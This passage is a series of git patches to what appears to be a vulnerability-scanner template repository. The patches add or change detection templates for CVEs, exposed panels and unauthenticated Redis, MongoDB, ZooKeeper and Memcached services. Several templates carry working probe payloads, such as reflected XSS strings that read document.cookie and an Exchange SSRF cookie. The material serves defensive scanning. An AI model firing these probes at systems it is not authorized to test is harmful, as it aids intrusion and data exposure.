{{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -28,7 +28,9 @@ requests: - type: status status: - 500 + - 503 + - type: word words: - - 'X-Calculatedbetarget: localhost' + - 'X-Calculatedbetarget: somethingnonexistent' part: header \ No newline at end of file From d04f74714714b92b95c99bd4a84532524c021c64 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 8 Mar 2021 16:17:59 +0200 Subject: [PATCH 305/370] Spelling mistake in the parameter --- cves/2021/CVE-2021-3019.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml index 03762eb81a..c16c9e1c5f 100644 --- a/cves/2021/CVE-2021-3019.yaml +++ b/cves/2021/CVE-2021-3019.yaml @@ -4,7 +4,7 @@ info: name: Lanproxy Directory Traversal author: pikpikcu severity: medium - refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 tags: cve,cve2021,lanproxy,traversal requests: From 22d8c537149a78b9f760414d54a2261dd3728b04 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Mar 2021 01:38:32 +0530 Subject: [PATCH 306/370] Create http-etcd-unauthenticated-api-data-leak.yaml --- ...tp-etcd-unauthenticated-api-data-leak.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml diff --git a/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml new file mode 100644 index 0000000000..8fc195ec40 --- /dev/null +++ b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml @@ -0,0 +1,21 @@ +id: http-etcd-unauthenticated-api-data-leak + +info: + name: etcd Unauthenticated HTTP API Leak + author: dhiyaneshDk + severity: high + reference: https://hackerone.com/reports/1088429 + +requests: + - method: GET + path: + - "{{BaseURL}}:2379/v2/auth/roles" + matchers-condition: and + matchers: + - type: word + words: + - '"role"' + part: body + - type: status + status: + - 200 From 8fcaf1d6c08d85cbe308bd363ed4a95b736da563 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 13:42:02 +0530 Subject: [PATCH 307/370] fixing syntax --- fuzzing/iis-shortname.yaml | 51 +++++++++++++++++++++++++++++--------- 1 file changed, 39 insertions(+), 12 deletions(-) diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 92c0ff9be2..1a2db42b20 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -4,20 +4,47 @@ info: author: nodauf severity: info description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~. - - # References: - # - https://github.com/lijiejie/IIS_shortname_Scanner - # - https://www.exploit-db.com/exploits/19525 + reference: | + - https://github.com/lijiejie/IIS_shortname_Scanner + - https://www.exploit-db.com/exploits/19525 requests: - - method: GET - path: - - "{{BaseURL}}/N0t4xist*~1*/a.aspx" - - "{{BaseURL}}/*~1*/a.aspx'" - - method: OPTIONS - path: - - "{{BaseURL}}/N0t4xist*~1*/a.aspx" - - "{{BaseURL}}/*~1*/a.aspx'" + - raw: + - | + GET /N0t4xist*~1*/a.aspx HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + GET /*~1*/a.aspx' HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + OPTIONS /*~1*/a.aspx' HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 matchers: - type: dsl From f8720698b6c4cc066e67cc288d2d7859444a607b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 9 Mar 2021 14:15:09 +0530 Subject: [PATCH 308/370] Added "text/html" matcher --- cves/2020/CVE-2020-12256.yaml | 8 ++++++-- cves/2020/CVE-2020-12258.yaml | 26 -------------------------- cves/2020/CVE-2020-12259.yaml | 8 ++++++-- 3 files changed, 12 insertions(+), 30 deletions(-) delete mode 100644 cves/2020/CVE-2020-12258.yaml diff --git a/cves/2020/CVE-2020-12256.yaml b/cves/2020/CVE-2020-12256.yaml index 2387a01575..a95e8d7a5b 100644 --- a/cves/2020/CVE-2020-12256.yaml +++ b/cves/2020/CVE-2020-12256.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/devicemgmt.php?deviceId=">' + - '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -19,8 +19,12 @@ requests: words: - "" part: body - condition: and - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/cves/2020/CVE-2020-12258.yaml b/cves/2020/CVE-2020-12258.yaml deleted file mode 100644 index 7b0a9099b8..0000000000 --- a/cves/2020/CVE-2020-12258.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2020-12258 - -info: - name: rConfig 3.9.4 XSS - author: pikpikcu - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12258 - tags: cve,cve2020,rconfig,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/configDevice.php?rid=">' - - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/cves/2020/CVE-2020-12259.yaml b/cves/2020/CVE-2020-12259.yaml index f85d3541d9..ea4c5907cd 100644 --- a/cves/2020/CVE-2020-12259.yaml +++ b/cves/2020/CVE-2020-12259.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/configDevice.php?rid=">' + - '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -19,8 +19,12 @@ requests: words: - "" part: body - condition: and - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" From 1b30de01329a06e68e251ccf26a5defd6c637110 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 08:46:47 +0000 Subject: [PATCH 309/370] Auto Update README [Tue Mar 9 08:46:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 58743a810d..243dd8ec7b 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 229 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 231 | vulnerabilities | 105 | exposed-panels | 103 | | exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 693 files**. +**72 directories, 695 files**. From 152957b3a68661576c643f77fd3478ee949c7812 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 9 Mar 2021 14:34:36 +0530 Subject: [PATCH 310/370] Update http-etcd-unauthenticated-api-data-leak.yaml --- .../http-etcd-unauthenticated-api-data-leak.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml index 8fc195ec40..f9d0431904 100644 --- a/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml +++ b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml @@ -9,13 +9,21 @@ info: requests: - method: GET path: - - "{{BaseURL}}:2379/v2/auth/roles" + - "{{BaseURL}}/v2/auth/roles" matchers-condition: and matchers: - type: word words: + - '"roles"' + - '"permissions"' - '"role"' + - '"kv"' + condition: and part: body - type: status status: - 200 + - type: word + part: header + words: + - "text/plain" From 9dee5fdc5af0667b8bdc45ab833a1bb8d21eb56d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 14:36:04 +0530 Subject: [PATCH 311/370] Adding cisco-sd-wan --- exposed-panels/cisco-asa-panel.yaml | 1 + exposed-panels/cisco-integrated-login.yaml | 1 + exposed-panels/cisco-sd-wan.yaml | 25 ++++++++++++++++++++++ exposed-panels/cisco-security-details.yaml | 1 + 4 files changed, 28 insertions(+) create mode 100644 exposed-panels/cisco-sd-wan.yaml diff --git a/exposed-panels/cisco-asa-panel.yaml b/exposed-panels/cisco-asa-panel.yaml index c2dff32b9b..62aa7c0b5d 100644 --- a/exposed-panels/cisco-asa-panel.yaml +++ b/exposed-panels/cisco-asa-panel.yaml @@ -4,6 +4,7 @@ info: name: Cisco ASA VPN panel detect author: organiccrap severity: info + tags: cisco requests: - method: GET diff --git a/exposed-panels/cisco-integrated-login.yaml b/exposed-panels/cisco-integrated-login.yaml index b075e29973..01d18adfab 100644 --- a/exposed-panels/cisco-integrated-login.yaml +++ b/exposed-panels/cisco-integrated-login.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/3859 + tags: cisco requests: - method: GET diff --git a/exposed-panels/cisco-sd-wan.yaml b/exposed-panels/cisco-sd-wan.yaml new file mode 100644 index 0000000000..c156f1460f --- /dev/null +++ b/exposed-panels/cisco-sd-wan.yaml @@ -0,0 +1,25 @@ +id: cisco-sd-wan + +info: + name: Cisco SD-WAN panel + author: z3bd + severity: info + reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj + tags: cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "SD-Wan Center" + part: body \ No newline at end of file diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml index a6d57e0007..8ddd313415 100644 --- a/exposed-panels/cisco-security-details.yaml +++ b/exposed-panels/cisco-security-details.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6708 + tags: cisco requests: - method: GET From b462b64361339fc80f7f480561e1a41429048488 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:06:32 +0000 Subject: [PATCH 312/370] Auto Update README [Tue Mar 9 09:06:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 243dd8ec7b..f7b3f44a3d 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 231 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 232 | vulnerabilities | 105 | exposed-panels | 103 | | exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 695 files**. +**72 directories, 696 files**. From 9463ecbfd9f803675ea5d072c793469d47ced431 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:06:37 +0000 Subject: [PATCH 313/370] Auto Update README [Tue Mar 9 09:06:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 243dd8ec7b..2750ba3681 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 231 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 231 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 695 files**. +**72 directories, 696 files**. From 78eaa8eb9016f1b8a5c03220b828eacaffd85083 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:07:12 +0000 Subject: [PATCH 314/370] Auto Update README [Tue Mar 9 09:07:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f7b3f44a3d..802970c755 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 232 | vulnerabilities | 105 | exposed-panels | 103 | -| exposures | 61 | technologies | 50 | misconfiguration | 53 | +| exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 696 files**. +**72 directories, 697 files**. From 16c11858e818e1d29ab2a70ab10fac1993432267 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:10:45 +0000 Subject: [PATCH 315/370] Auto Update README [Tue Mar 9 09:10:45 UTC 2021] :robot: --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c0817c699e..af19ac98af 100644 --- a/README.md +++ b/README.md @@ -37,14 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 231 | vulnerabilities | 105 | exposed-panels | 104 | -| cves | 232 | vulnerabilities | 105 | exposed-panels | 103 | +| cves | 232 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 697 files**. +**72 directories, 698 files**. From 27412498751acf10a3c5edcb4b00b3327104fdb2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 9 Mar 2021 14:45:03 +0530 Subject: [PATCH 316/370] Update CVE-2020-14413.yaml --- cves/2020/CVE-2020-14413.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml index 02f0fa97eb..a519234e4b 100644 --- a/cves/2020/CVE-2020-14413.yaml +++ b/cves/2020/CVE-2020-14413.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/Devices-Config.php?sta=">' + - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' matchers-condition: and matchers: @@ -19,8 +19,12 @@ requests: words: - "" part: body - condition: and - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From 1c94e7bc229eeb568dcafce1220472f7382377bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 09:17:02 +0000 Subject: [PATCH 317/370] Auto Update README [Tue Mar 9 09:17:02 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index af19ac98af..edec0ebcaf 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 232 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 233 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 698 files**. +**72 directories, 699 files**. From f7104e0a24cd238c46861432a44300378558f441 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 16:53:40 +0530 Subject: [PATCH 318/370] Adding network templates --- network/exposed-redis.yaml | 26 ++++++++++++++++++++++++++ network/exposed-zookeeper.yaml | 21 +++++++++++++++++++++ network/memcached-stats.yaml | 20 ++++++++++++++++++++ network/mongodb-detect.yaml | 23 +++++++++++++++++++++++ network/mongodb-unauth.yaml | 21 +++++++++++++++++++++ 5 files changed, 111 insertions(+) create mode 100644 network/exposed-redis.yaml create mode 100644 network/exposed-zookeeper.yaml create mode 100644 network/memcached-stats.yaml create mode 100644 network/mongodb-detect.yaml create mode 100644 network/mongodb-unauth.yaml diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml new file mode 100644 index 0000000000..e26d48324c --- /dev/null +++ b/network/exposed-redis.yaml @@ -0,0 +1,26 @@ +id: exposed-redis + +info: + name: Redis Unauth Server + author: pd-team + severity: high + reference: https://redis.io/topics/security + tags: network,redis + +network: + - inputs: + - data: "info\r\nquit\r\n" + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers-condition: and + matchers: + - type: word + words: + - "redis_version" + - type: word + negative: true + words: + - "redis_mode:sentinel" \ No newline at end of file diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml new file mode 100644 index 0000000000..cb9cf1dd71 --- /dev/null +++ b/network/exposed-zookeeper.yaml @@ -0,0 +1,21 @@ +id: exposed-zookeeper + +info: + name: ZooKeeper Unauth Server + author: pd-team + severity: high + reference: https://zookeeper.apache.org/security.html + tags: network,zookeeper + +network: + - inputs: + - data: "envi\r\nquit\r\n" + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers: + - type: word + words: + - "zookeeper.version" \ No newline at end of file diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml new file mode 100644 index 0000000000..e6e831c8c1 --- /dev/null +++ b/network/memcached-stats.yaml @@ -0,0 +1,20 @@ +id: memcached-stats + +info: + name: Memcached stats disclosure + author: pd-team + severity: low + tags: network,memcached + +network: + - inputs: + - data: "stats\r\n\r\nquit\r\n" + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers: + - type: word + words: + - "STAT " \ No newline at end of file diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml new file mode 100644 index 0000000000..da8deba9c4 --- /dev/null +++ b/network/mongodb-detect.yaml @@ -0,0 +1,23 @@ +id: mongodb-detect + +info: + name: MongoDB Detection + author: pd-team + severity: info + reference: https://github.com/orleven/Tentacle + tags: network,mongodb + +network: + - inputs: + - data: 3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000 + type: hex + + host: + - "{{Hostname}}" + read-size: 2048 + + matchers: + - type: word + words: + - "logicalSessionTimeout" + - "localTime" \ No newline at end of file diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml new file mode 100644 index 0000000000..a8febc3c70 --- /dev/null +++ b/network/mongodb-unauth.yaml @@ -0,0 +1,21 @@ +id: mongodb-unauth + +info: + name: Unauth MongoDB Disclosure + author: pd-team + severity: high + reference: https://github.com/orleven/Tentacle + tags: network,mongodb + +network: + - inputs: + - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 + type: hex + + host: + - "{{Hostname}}" + read-size: 2048 + matchers: + - type: word + words: + - "totalLinesWritten" \ No newline at end of file From 67d194337d77661fd1ac6ccdbbdcf9fba9f01231 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 16:58:33 +0530 Subject: [PATCH 319/370] Adding ports for related services --- network/exposed-redis.yaml | 2 +- network/exposed-zookeeper.yaml | 2 +- network/memcached-stats.yaml | 2 +- network/mongodb-detect.yaml | 2 +- network/mongodb-unauth.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index e26d48324c..b3a6723804 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -12,7 +12,7 @@ network: - data: "info\r\nquit\r\n" host: - - "{{Hostname}}" + - "{{Hostname}}:6379" read-size: 2048 matchers-condition: and diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index cb9cf1dd71..33efe6f865 100644 --- a/network/exposed-zookeeper.yaml +++ b/network/exposed-zookeeper.yaml @@ -12,7 +12,7 @@ network: - data: "envi\r\nquit\r\n" host: - - "{{Hostname}}" + - "{{Hostname}}:2181" read-size: 2048 matchers: diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml index e6e831c8c1..5252fd2b3f 100644 --- a/network/memcached-stats.yaml +++ b/network/memcached-stats.yaml @@ -11,7 +11,7 @@ network: - data: "stats\r\n\r\nquit\r\n" host: - - "{{Hostname}}" + - "{{Hostname}}:11211" read-size: 2048 matchers: diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml index da8deba9c4..7ba70d3c82 100644 --- a/network/mongodb-detect.yaml +++ b/network/mongodb-detect.yaml @@ -13,7 +13,7 @@ network: type: hex host: - - "{{Hostname}}" + - "{{Hostname}}:27017" read-size: 2048 matchers: diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index a8febc3c70..eccd19ea30 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -13,7 +13,7 @@ network: type: hex host: - - "{{Hostname}}" + - "{{Hostname}}:27017" read-size: 2048 matchers: - type: word From 31d4748c8369d10abc80ffe3307767f4b5e4f2ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 11:29:00 +0000 Subject: [PATCH 320/370] Auto Update README [Tue Mar 9 11:29:00 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index edec0ebcaf..f50e859c2d 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 699 files**. +**73 directories, 704 files**. From f530dfa11601890a2ec467e4ecc97c2d6be2ff62 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 9 Mar 2021 17:03:30 +0530 Subject: [PATCH 321/370] support both user input + expected port --- network/exposed-redis.yaml | 1 + network/exposed-zookeeper.yaml | 1 + network/memcached-stats.yaml | 1 + network/mongodb-detect.yaml | 1 + network/mongodb-unauth.yaml | 1 + 5 files changed, 5 insertions(+) diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index b3a6723804..ee683481cd 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -12,6 +12,7 @@ network: - data: "info\r\nquit\r\n" host: + - "{{Hostname}}" - "{{Hostname}}:6379" read-size: 2048 diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index 33efe6f865..027a490123 100644 --- a/network/exposed-zookeeper.yaml +++ b/network/exposed-zookeeper.yaml @@ -12,6 +12,7 @@ network: - data: "envi\r\nquit\r\n" host: + - "{{Hostname}}" - "{{Hostname}}:2181" read-size: 2048 diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml index 5252fd2b3f..62f8e25bae 100644 --- a/network/memcached-stats.yaml +++ b/network/memcached-stats.yaml @@ -11,6 +11,7 @@ network: - data: "stats\r\n\r\nquit\r\n" host: + - "{{Hostname}}" - "{{Hostname}}:11211" read-size: 2048 diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml index 7ba70d3c82..55716383b9 100644 --- a/network/mongodb-detect.yaml +++ b/network/mongodb-detect.yaml @@ -13,6 +13,7 @@ network: type: hex host: + - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index eccd19ea30..6d8c522a1d 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -13,6 +13,7 @@ network: type: hex host: + - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 matchers: From 541635d3c5b3099c1118f0018200af115f80c6cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Mar 2021 20:26:46 +0000 Subject: [PATCH 322/370] Auto Update README [Tue Mar 9 20:26:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index edec0ebcaf..fd859f3c48 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 233 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 234 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 699 files**. +**72 directories, 700 files**. From c4fbeb6ad42ba2be6d3eff1a82ce2d449ce3b6a1 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 20:49:46 +0000 Subject: [PATCH 323/370] Update docker-compose-config.yml Remove duplicate line and add support for docker-compose.override.yml --- exposures/configs/docker-compose-config.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yml index 0cb1a9a1d4..b5b7c104e9 100644 --- a/exposures/configs/docker-compose-config.yml +++ b/exposures/configs/docker-compose-config.yml @@ -2,7 +2,7 @@ id: docker-compose-config info: name: docker-compose.yml exposure - author: meme-lord & blckraven + author: meme-lord & blckraven & geeknik severity: medium requests: @@ -15,7 +15,8 @@ requests: - "{{BaseURL}}/docker-compose.production.yml" - "{{BaseURL}}/docker-compose.staging.yml" - "{{BaseURL}}/docker-compose.dev.yml" - - "{{BaseURL}}/docker-compose-dev.yml" + - "{{BaseURL}}/docker-compose.override.yml" + matchers-condition: and matchers: - type: dsl From 0e9b40a2124ec64d0e6ebbb8fc46a63d4ee434b7 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 20:52:45 +0000 Subject: [PATCH 324/370] Update docker-compose-config.yml My bad, wasn't a duplicate line. Guess I need my eyes checked. \m/ --- exposures/configs/docker-compose-config.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yml index b5b7c104e9..1a6259d516 100644 --- a/exposures/configs/docker-compose-config.yml +++ b/exposures/configs/docker-compose-config.yml @@ -15,6 +15,7 @@ requests: - "{{BaseURL}}/docker-compose.production.yml" - "{{BaseURL}}/docker-compose.staging.yml" - "{{BaseURL}}/docker-compose.dev.yml" + - "{{BaseURL}}/docker-compose-dev.yml" - "{{BaseURL}}/docker-compose.override.yml" matchers-condition: and From 13155a5e705057306e678d8ff6f2baefc298bad4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:10:42 +0000 Subject: [PATCH 325/370] Create circleci-config.yaml --- exposures/configs/circleci-config.yaml | 25 +++++++++++++++++++++++++ 